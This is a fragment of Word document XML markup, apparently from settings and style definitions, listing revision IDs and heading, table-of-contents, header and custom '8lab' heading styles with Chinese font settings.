    <w:rsid w:val="00A941A1"/>
    <w:rsid w:val="00A95316"/>
    <w:rsid w:val="00AC1109"/>
    <w:rsid w:val="00AD447E"/>
    <w:rsid w:val="00AF494E"/>
    <w:rsid w:val="00AF76FC"/>
    <w:rsid w:val="00B005A8"/>
    <w:rsid w:val="00B03496"/>
    <w:rsid w:val="00B05F13"/>
    <w:rsid w:val="00B17A0A"/>
    <w:rsid w:val="00B2181D"/>
    <w:rsid w:val="00B239F7"/>
    <w:rsid w:val="00B270B5"/>
    <w:rsid w:val="00B273B5"/>
    <w:rsid w:val="00B50988"/>
    <w:rsid w:val="00B56EA7"/>
    <w:rsid w:val="00B65447"/>
    <w:rsid w:val="00BB54AD"/>
    <w:rsid w:val="00BB6E67"/>
    <w:rsid w:val="00BC04EC"/>
    <w:rsid w:val="00BC36A3"/>
    <w:rsid w:val="00C110ED"/>
    <w:rsid w:val="00C1131A"/>
    <w:rsid w:val="00C134BB"/>
    <w:rsid w:val="00C2216B"/>
    <w:rsid w:val="00C225F9"/>
    <w:rsid w:val="00C36A26"/>
    <w:rsid w:val="00C40F95"/>
    <w:rsid w:val="00C55A9C"/>
    <w:rsid w:val="00C569E5"/>
    <w:rsid w:val="00C806B7"/>
    <w:rsid w:val="00C839CB"/>
    <w:rsid w:val="00C8507E"/>
    <w:rsid w:val="00CA1E9A"/>
    <w:rsid w:val="00CC313D"/>
    <w:rsid w:val="00CC694E"/>
    <w:rsid w:val="00CC6D8A"/>
    <w:rsid w:val="00CD0BDF"/>
    <w:rsid w:val="00CD0D1B"/>
    <w:rsid w:val="00D054DE"/>
    <w:rsid w:val="00D14680"/>
    <w:rsid w:val="00D245AA"/>
    <w:rsid w:val="00D25042"/>
    <w:rsid w:val="00D34165"/>
    <w:rsid w:val="00D43A10"/>
    <w:rsid w:val="00D47F2F"/>
    <w:rsid w:val="00D71F02"/>
    <w:rsid w:val="00D722BD"/>
    <w:rsid w:val="00D73B05"/>
    <w:rsid w:val="00D90B6B"/>
    <w:rsid w:val="00D94BBC"/>
    <w:rsid w:val="00DA2394"/>
    <w:rsid w:val="00DB04AD"/>
    <w:rsid w:val="00DB6140"/>
    <w:rsid w:val="00DF19C5"/>
    <w:rsid w:val="00DF31B4"/>
    <w:rsid w:val="00E0407E"/>
    <w:rsid w:val="00E15349"/>
    <w:rsid w:val="00E17CD0"/>
    <w:rsid w:val="00E20461"/>
    <w:rsid w:val="00E25719"/>
    <w:rsid w:val="00E277D5"/>
    <w:rsid w:val="00E43C7C"/>
    <w:rsid w:val="00E47306"/>
    <w:rsid w:val="00E523C0"/>
    <w:rsid w:val="00E56687"/>
    <w:rsid w:val="00E5735C"/>
    <w:rsid w:val="00E6048B"/>
    <w:rsid w:val="00E63162"/>
    <w:rsid w:val="00E7494A"/>
    <w:rsid w:val="00E77EF6"/>
    <w:rsid w:val="00E959DC"/>
    <w:rsid w:val="00EB31F8"/>
    <w:rsid w:val="00ED1283"/>
    <w:rsid w:val="00EF34D4"/>
    <w:rsid w:val="00F04B84"/>
    <w:rsid w:val="00F23570"/>
    <w:rsid w:val="00F23DF1"/>
    <w:rsid w:val="00F301B6"/>
    <w:rsid w:val="00F3212D"/>
    <w:rsid w:val="00F35BFF"/>
    <w:rsid w:val="00F360CF"/>
    <w:rsid w:val="00F422B4"/>
    <w:rsid w:val="00F42FB8"/>
    <w:rsid w:val="00F44F83"/>
    <w:rsid w:val="00F50694"/>
    <w:rsid w:val="00F52796"/>
    <w:rsid w:val="00F566C0"/>
    <w:rsid w:val="00F5725D"/>
    <w:rsid w:val="00F71BF6"/>
    <w:rsid w:val="00F77438"/>
    <w:rsid w:val="00FA76F6"/>
    <w:rsid w:val="00FC4256"/>
    <w:rsid w:val="00FD040B"/>
    <w:rsid w:val="00FF60C5"/>
    <w:rsid w:val="00FF6E80"/>
    <w:rsid w:val="01DF6518"/>
    <w:rsid w:val="75E02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0600EAB6"/>
  <w15:docId w15:val="{E69DEE32-04EE-442E-8AC5-53559F224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iPriority="0" w:unhideWhenUsed="1" w:qFormat="1"/>
    <w:lsdException w:name="annotation text" w:uiPriority="0" w:qFormat="1"/>
    <w:lsdException w:name="header" w:uiPriority="0" w:qFormat="1"/>
    <w:lsdException w:name="footer" w:uiPriority="0"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uiPriority="0"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semiHidden="1" w:unhideWhenUsed="1"/>
    <w:lsdException w:name="HTML Keyboard" w:semiHidden="1" w:unhideWhenUsed="1"/>
    <w:lsdException w:name="HTML Preformatted" w:unhideWhenUsed="1" w:qFormat="1"/>
    <w:lsdException w:name="HTML Sample" w:unhideWhenUsed="1" w:qFormat="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B5F"/>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numPr>
        <w:numId w:val="4"/>
      </w:numPr>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numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="4"/>
      </w:numPr>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pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="4"/>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4"/>
      </w:numPr>
      <w:spacing w:before="280" w:after="290" w:line="376" w:lineRule="auto"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="黑体" w:hAnsi="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="5">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="5Char"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="4"/>
        <w:numId w:val="4"/>
      </w:numPr>
      <w:spacing w:before="280" w:after="290" w:line="376" w:lineRule="auto"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="6">
    <w:name w:val="heading 6"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="6Char"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="5"/>
        <w:numId w:val="4"/>
      </w:numPr>
      <w:spacing w:before="240" w:after="64" w:line="320" w:lineRule="auto"/>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="7">
    <w:name w:val="heading 7"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="7Char"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="6"/>
        <w:numId w:val="4"/>
      </w:numPr>
      <w:spacing w:before="240" w:after="64" w:line="320" w:lineRule="auto"/>
      <w:outlineLvl w:val="6"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="8">
    <w:name w:val="heading 8"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="8Char"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="7"/>
        <w:numId w:val="4"/>
      </w:numPr>
      <w:spacing w:before="240" w:after="64" w:line="320" w:lineRule="auto"/>
      <w:outlineLvl w:val="7"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="9">
    <w:name w:val="heading 9"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="9Char"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="8"/>
        <w:numId w:val="4"/>
      </w:numPr>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1260"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a3">
    <w:name w:val="Normal Indent"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char"/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:firstLineChars="200" w:firstLine="420"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a4">
    <w:name w:val="caption"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="Char0"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="黑体" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a5">
    <w:name w:val="Document Map"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char1"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="宋体"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a6">
    <w:name w:val="annotation text"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char2"/>
    <w:qFormat/>
    <w:pPr>
      <w:jc w:val="left"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="50">
    <w:name w:val="toc 5"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:left="840"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="30">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:uiPriority w:val="39"/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:left="420"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="微软雅黑" w:hAnsiTheme="minorHAnsi"/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="24"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="80">
    <w:name w:val="toc 8"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:left="1470"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a7">
    <w:name w:val="Date"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="Char3"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:leftChars="2500" w:left="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a8">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char4"/>
    <w:qFormat/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a9">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char5"/>
    <w:qFormat/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4153"/>
        <w:tab w:val="right" w:pos="8306"/>
      </w:tabs>
      <w:snapToGrid w:val="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="aa">
    <w:name w:val="header"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char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2F26E3"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
      </w:tabs>
      <w:snapToGrid w:val="0"/>
      <w:spacing w:beforeLines="100" w:before="100"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="微软雅黑" w:hAnsiTheme="minorHAnsi"/>
      <w:b/>
      <w:bCs/>
      <w:caps/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="40">
    <w:name w:val="toc 4"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:left="630"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ab">
    <w:name w:val="footnote text"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char7"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:snapToGrid w:val="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="60">
    <w:name w:val="toc 6"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:left="1050"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ac">
    <w:name w:val="table of figures"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:left="420" w:hanging="420"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:smallCaps/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="20">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:uiPriority w:val="39"/>
    <w:qFormat/>
    <w:rsid w:val="002F26E3"/>
    <w:pPr>
      <w:ind w:left="210"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="微软雅黑" w:hAnsiTheme="minorHAnsi"/>
      <w:smallCaps/>
      <w:sz w:val="18"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="90">
    <w:name w:val="toc 9"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:left="1680"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>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d">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="a"/>
    <w:qFormat/>
    <w:pPr>
      <w:widowControl/>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ae">
    <w:name w:val="Title"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="Char8"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="240" w:after="60"/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af">
    <w:name w:val="annotation subject"/>
    <w:basedOn w:val="a6"/>
    <w:next w:val="a6"/>
    <w:link w:val="Char9"/>
    <w:qFormat/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="af0">
    <w:name w:val="Table Grid"/>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unhideWhenUsed/>
    <w:qFormat/>
    <w:rPr>
      <w:color w:val="800080"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="af2">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="a0"/>
    <w:qFormat/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="af3">
    <w:name w:val="Hyperlink"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTML0">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="af4">
    <w:name w:val="annotation reference"/>
    <w:basedOn w:val="a0"/>
    <w:qFormat/>
    <w:rPr>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTML1">
    <w:name w:val="HTML Sample"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>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Cambria" w:eastAsia="宋体" w:hAnsi="Cambria" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="2"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="3Char">
    <w:name w:val="标题 3 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="3"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="2"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="4Char">
    <w:name w:val="标题 4 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="4"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="黑体" w:hAnsi="Arial" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="2"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="5Char">
    <w:name w:val="标题 5 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="5"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="2"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="6Char">
    <w:name w:val="标题 6 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="6"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="宋体" w:hAnsi="Cambria" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="2"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="7Char">
    <w:name w:val="标题 7 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="7"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="2"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="8Char">
    <w:name w:val="标题 8 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="8"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="宋体" w:hAnsi="Cambria" w:cs="Times New Roman"/>
      <w:kern w:val="2"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="9Char">
    <w:name w:val="标题 9 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="9"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="宋体" w:hAnsi="Cambria" w:cs="Times New Roman"/>
      <w:kern w:val="2"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char6">
    <w:name w:val="页眉 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="aa"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char5">
    <w:name w:val="页脚 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a9"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="8lab-1">
    <w:name w:val="8lab-1级标题"/>
    <w:basedOn w:val="-1"/>
    <w:link w:val="8lab-1Char"/>
    <w:qFormat/>
    <w:rsid w:val="00304677"/>
    <w:pPr>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="000000" w:themeColor="text1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="8lab-1Char">
    <w:name w:val="8lab-1级标题 Char"/>
    <w:basedOn w:val="1Char"/>
    <w:link w:val="8lab-1"/>
    <w:qFormat/>
    <w:rsid w:val="00304677"/>
    <w:rPr>
      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
      <w:b/>
      <w:bCs/>
      <w:snapToGrid w:val="0"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:spacing w:val="12"/>
      <w:kern w:val="44"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="8lab-2">
    <w:name w:val="8lab-2级标题"/>
    <w:basedOn w:val="-2"/>
    <w:link w:val="8lab-2Char"/>
    <w:qFormat/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:adjustRightInd/>
      <w:spacing w:line="400" w:lineRule="exact"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="000000" w:themeColor="text1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="8lab-2Char">
    <w:name w:val="8lab-2级标题 Char"/>
    <w:basedOn w:val="2Char"/>
    <w:link w:val="8lab-2"/>
    <w:qFormat/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
      <w:b/>
      <w:bCs/>
      <w:iCs/>
      <w:snapToGrid w:val="0"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:kern w:val="2"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="8lab-3">
    <w:name w:val="8lab-3级标题"/>
    <w:basedOn w:val="-3"/>
    <w:link w:val="8lab-3Char"/>
    <w:qFormat/>
    <w:rsid w:val="00304677"/>
    <w:pPr>
      <w:adjustRightInd/>
      <w:spacing w:line="400" w:lineRule="exact"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="000000" w:themeColor="text1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char8">
    <w:name w:val="标题 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="ae"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="宋体" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="8lab-3Char">
    <w:name w:val="8lab-3级标题 Char"/>
    <w:basedOn w:val="3Char"/>
    <w:link w:val="8lab-3"/>
    <w:qFormat/>
    <w:rsid w:val="00304677"/>
    <w:rPr>
      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:kern w:val="2"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="8lab-40">
    <w:name w:val="8lab-4级标题"/>
    <w:basedOn w:val="4"/>
    <w:link w:val="8lab-41"/>
    <w:qFormat/>
    <w:rsid w:val="00F35BFF"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="0"/>
      </w:numPr>
      <w:spacing w:before="0" w:afterLines="100" w:after="100" w:line="400" w:lineRule="exact"/>
      <w:ind w:firstLineChars="200" w:firstLine="200"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="30"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="8lab-41">
    <w:name w:val="8lab-4级标题 字符"/>
    <w:basedOn w:val="4Char"/>
    <w:link w:val="8lab-40"/>
    <w:qFormat/>
    <w:rsid w:val="00F35BFF"/>
    <w:rPr>
      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:kern w:val="2"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="30"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="8lab-5">
    <w:name w:val="8lab-5级标题"/>
    <w:basedOn w:val="5"/>
    <w:link w:val="8lab-5Char"/>
    <w:qFormat/>
    <w:rsid w:val="00F35BFF"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
      <w:b w:val="0"/>
      <w:color w:val="000000" w:themeColor="text1"/>
